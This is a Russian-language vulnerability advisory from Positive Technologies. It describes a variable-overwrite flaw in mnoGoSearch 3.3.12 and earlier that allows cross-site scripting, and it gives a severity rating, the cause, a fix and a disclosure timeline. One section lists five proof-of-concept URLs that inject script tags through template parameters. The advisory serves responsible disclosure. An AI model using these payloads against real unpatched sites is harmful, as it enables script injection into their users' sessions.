PT-2013-18: Перезапись переменных в mnoGoSearch Уязвимое ПОmnoGoSearch Версия: 3.3.12 и более ранняяСсылка: http://www.mnogosearch.org/Рейтинг опасностиУровень опасности: средний Воздействие: межсайтовое выполнение сценариев Вектор атаки: удаленныйCVSS v2: Base Score: 4.3 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) CVE: отсутствуетОписание программыmnoGoSearch - универсальная поисковая система для локальных и глобальных серверов.Описание уязвимостиСпециалисты исследовательского центра компании Positive Technologies обнаружили уязвимость "Межсайтовое выполнение сценариев" в приложении mnoGoSearch.Из-за некорректной архитектуры приложения все переменные шаблона и переменные, переданные клиентом, хранятся в одном списке. Это позволяет перезаписать любые неинициализированные параметры, используемые в шаблоне. Перезапись параметров, отображаемых на странице без предварительной обработки, приводит к множественным уязвимостям типа "Межсайтовое выполнение сценариев". Пример эксплуатацииhttp://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a РешениеУстановите последнюю версию приложения.Статус уведомления 15.02.2013 - Производителю отправлены детали уязвимости 01.03.2013 - Производитель выпустил исправление 05.03.2013 - Публикация уязвимости БлагодарностиУязвимость обнаружил Сергей Бобров (Исследовательcкий центр Positive Research компании Positive Technologies)Ссылкиhttp://www.securitylab.ru/lab/PT-2013-18 http://www.mnogosearch.org/bugs/index.php?id=4819Список отчетов о ранее обнаруженных уязвимостях Positive Research:http://www.ptsecurity.ru/lab/advisory/ http://www.securitylab.ru/lab/
